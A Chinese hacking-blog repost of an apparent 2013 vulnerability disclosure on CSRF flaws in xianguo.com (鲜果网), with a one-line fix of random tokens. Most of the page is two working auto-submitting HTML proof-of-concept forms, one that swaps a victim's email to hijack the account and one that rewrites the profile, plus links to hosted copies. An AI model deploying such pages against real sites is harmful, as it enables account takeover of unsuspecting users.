记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

鲜果网csrf两枚可劫持用户账号

2013-04-24 13:35
1.劫持账号
修改邮箱处存在csrf,可修改邮箱,进而劫持账户。因为一个邮箱只能绑定一个账号,所以可以使用数组随机抽取邮箱。
POC:
 
<html>
<body>
<form name="csrf" action="http://xianguo.com/setting/change-email" method="POST">
<script>
var email =['root1@wooyun.org','root2@wooyun.org','root3@wooyun.org','root4@wooyun.org','root5@wooyun.org','root6@wooyun.org','root7@wooyun.org','root8@wooyun.org','root9@wooyun.org','root10@wooyun.org'];
function Rand(arr, len) { 
    arr.sort(function () { 
        return Math.random()-0.5; 
    }); 
    return arr.slice(0, len); 
}
//alert(Rand(email,1));
document.write("<input type=text name=email_ChgOld value="+Rand(email,1)+"></input>");
</script>
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>
2.修改用户信息
修改个人信息处存在csrf,个人信息任意改。由于昵称需要唯一性,所以此处昵称将会被修改为wooyun+5个随机字母。
 
<html>
<body>
<form name="csrf" action="http://xianguo.com/setting/profile" method="POST">
<script>
function rand(len)
{
var tmp = "";
for(var i = 0; i < len; i++)
{
tmp += String.fromCharCode(Math.floor(Math.random() * 26) + "a".charCodeAt(0));
}
return tmp;
}
document.write("<input type=text name=mark value=wooyun"+rand(5)+"></input>");</script>
<input type="text" name="province" value="-1" />
<input type="text" name="city" value="-1" />
<input type="text" name="nickname" value="乌云" />
<input type="text" name="url" value="http://wooyun.org" />
<input type="text" name="description" value="我中招了" />
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>


1.劫持账号
 
 




 
 
http://email.smtp.yupage.com/xianguo2.htm
2.修改信息
 
http://email.smtp.yupage.com/xianguo.htm

 
修复方案:

随机token
知识来源: www.2cto.com/Article/201304/205538.html

阅读:91435 | 评论:0 | 标签:CSRF

想收藏或者和大家分享这篇好文章→复制链接地址

“鲜果网csrf两枚可劫持用户账号”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词